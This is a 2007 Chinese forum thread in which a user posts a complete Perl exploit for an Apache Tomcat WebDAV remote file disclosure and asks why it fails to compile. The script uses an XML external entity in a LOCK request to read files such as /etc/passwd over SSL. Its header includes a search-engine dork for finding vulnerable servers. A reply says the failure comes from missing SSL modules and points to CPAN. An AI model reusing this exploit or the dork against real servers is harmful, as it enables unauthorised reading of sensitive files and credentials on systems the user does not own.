脚本编译失败,请教!

plbb18

1. #!/usr/bin/perl
   
2. #================================================================
   
3. # Apache Tomcat Remote File Disclosure Zeroday Xploit - With support for SSL
   
4. # MoDiFiEd version by  : h3rcul3s
   
5. # ORiGiNaL Version by  : kcdarookie aka eliteb0y / 2007  [url]http://milw0rm.org/exploits/4530[/url]
   
6. # MoDiFiCaTiOn               : This code is useble against targets over SSL
   
7. # Prerequisites        : A valid login credentials, webdav
   
8. # DoRk                 : intitle:"Directory Listing For /" + inurl:webdav tomcat
   
9. # Potential targets    : similar to [url]https://www.somehost.com:8443[/url]
   
10. #================================================================
    
11. # THaNkS To eliteb0y, the whole team AnD "perlmonks".
    
12. # This piece of code is written ONLY for educational purpose.
    
13. # Use it at your own risk.
    
14. # No author will be responsible for any damage.
    
15. #================================================================
    
16. # -------------------------[C O D E]-----------------------------
    
17. #================================================================
    
18. use LWP::Protocol::https;
    
19. use IO::Socket;
    
20. use MIME::Base64; ### FIXME! Maybe support other auths too ?
    
21. 
    
22. # SET REMOTE PORT HERE--------------------------------------------
    
23. $remoteport = 8443;
    
24. 
    
25. sub usage {
    
26.        print "\nApache Tomcat Remote File Disclosure Zeroday Xploit\n";
    
27.        print "\n\n";
    
28.        print "Basic exploit by      : kcdarookie aka eliteb0y / 2007\n";
    
29.        print "SSL Support added by  : .o0|h 3 r c u l 3 s|0o. \n";
    
30.        print "\n\n";
    
31.        print "USAGE  :\nperl  TOMCATXPL-SSL <remotehost> <webdav file> <file to retrieve> [username] [password] [https]\n";
    
32.        print "\nExample:\nperl TOMCATXPL-SSL [url]www.hostname.com[/url] /webdav /etc/passwd tomcat tomcat https\n\n";exit;
    
33.            }
    
34. 
    
35. if ($#ARGV < 2) {usage();}
    
36. 
    
37. $hostname = $ARGV[0];
    
38. $webdavfile = $ARGV[1];
    
39. $remotefile = $ARGV[2];
    
40. $username = $ARGV[3];
    
41. $password = $ARGV[4];
    
42. 
    
43. my $sock = LWP::Protocol::https::Socket->new(PeerAddr => $hostname,
    
44.                                         PeerPort => $remoteport,
    
45.                                              Proto    => 'tcp');
    
46. $|=1;
    
47. 
    
48. $BasicAuth = encode_base64("$username:$password");
    
49. 
    
50. $KRADXmL =
    
51. "<?xml version=\"1.0\"?>\n"
    
52. ."<!DOCTYPE REMOTE [\n"
    
53. ."<!ENTITY RemoteX SYSTEM \"$remotefile\">\n"
    
54. ."]>\n"
    
55. ."<D:lockinfo xmlns:D='DAV:'>\n"
    
56. ."<D:lockscope><D:exclusive/></D:lockscope>\n"
    
57. ."<D:locktype><D:write/></D:locktype>\n"
    
58. ."<D:owner>\n"
    
59. ."<D:href>\n"
    
60. ."<REMOTE>\n"
    
61. ."<RemoteX>&RemoteX;</RemoteX>\n"
    
62. ."</REMOTE>\n"
    
63. ."</D:href>\n"
    
64. ."</D:owner>\n"
    
65. ."</D:lockinfo>\n";
    
66. 
    
67. print "\nApache Tomcat Remote File Disclosure Zeroday Eploit-SSL verssion\n";
    
68. print "\n";
    
69. print "Launching Remote Exploit over SSL...\n";
    
70. 
    
71. $ExploitRequest =
    
72. "LOCK $webdavfile HTTP/1.1\r\n"
    
73. ."Host: $hostname\r\n";
    
74. 
    
75. if ($username ne "") {
    
76. $ExploitRequest .= "Authorization: Basic $BasicAuth\r\n";
    
77. }
    
78. $ExploitRequest .= "Content-Type: text/xml\r\nContent-Length: ".length($KRADXmL)."\r\n\r\n" . $KRADXmL;
    
79. 
    
80. print $sock $ExploitRequest;
    
81. 
    
82. while(<$sock>) {
    
83.        print;
    
84. }
    

复制代码

在LINUX下和WINDOWS下编译失败,请朋友们帮忙看一下是什么原因?THANKS~~~~

E:\>perl TOMCATXPL-SSL.pl
Can't locate Net/SSL.pm in @INC) at D:/Perl/lib/Net/HTTPS.pm line 18.
Can't locate IO/Socket/SSL.pm in @INC (@INC contains: D:/Perl/site/lib D:/
ib .) at D:/Perl/lib/Net/HTTPS.pm line 22.
Compilation failed in require at D:/Perl/lib/LWP/Protocol/https.pm line 46
Compilation failed in require at TOMCATXPL-SSL.pl line 18.
BEGIN failed--compilation aborted at TOMCATXPL-SSL.pl line 18.

[root@localhost test]# ls -al
总用量 12
drwxr-xr-x    2 root     root         4096 10月 28 10:37 .
drwxr-x---   15 root     root         4096 10月 28 21:56 ..
-rw-r--r--    1 root     root         2920 10月 28 10:14 TOMCATXPL-SSL.pl
[root@localhost test]# perl TOMCATXPL-SSL.pl
Can't locate Net/SSL.pm in @INC) at /usr/lib/perl5/vendor_perl/5.8.0/Net/HTTPS.pm line 15.
Can't locate IO/Socket/SSL.pm in @INC (@INC contains: /usr/lib/perl5/5.8.0/i386-linux-thread-multi /usr/lib/perl5/5.8.0 /usr/lib/perl5/site_perl/5.8.0/i386-linux-thread-multi /usr/lib/perl5/site_perl/5.8.0 /usr/lib/perl5/site_perl /usr/lib/perl5/vendor_perl/5.8.0/i386-linux-thread-multi /usr/lib/perl5/vendor_perl/5.8.0 /usr/lib/perl5/vendor_perl /usr/lib/perl5/5.8.0/i386-linux-thread-multi /usr/lib/perl5/5.8.0 .) at /usr/lib/perl5/vendor_perl/5.8.0/Net/HTTPS.pm line 19.
Compilation failed in require at /usr/lib/perl5/vendor_perl/5.8.0/LWP/Protocol/https.pm line 44.
Compilation failed in require at TOMCATXPL-SSL.pl line 18.
BEGIN failed--compilation aborted at TOMCATXPL-SSL.pl line 18.
[root@localhost test]# uname -a
Linux localhost.localdomain 2.4.20-8 #1 Thu Mar 13 17:54:28 EST 2003 i686 i686 i386 GNU/Linux
[root@localhost test]#

[ 本帖最后由 plbb18 于 2007-10-28 22:20 编辑 ]

ocean390

缺少ssl模块，上cpan去下载吧

plbb18

THANKS~~~~~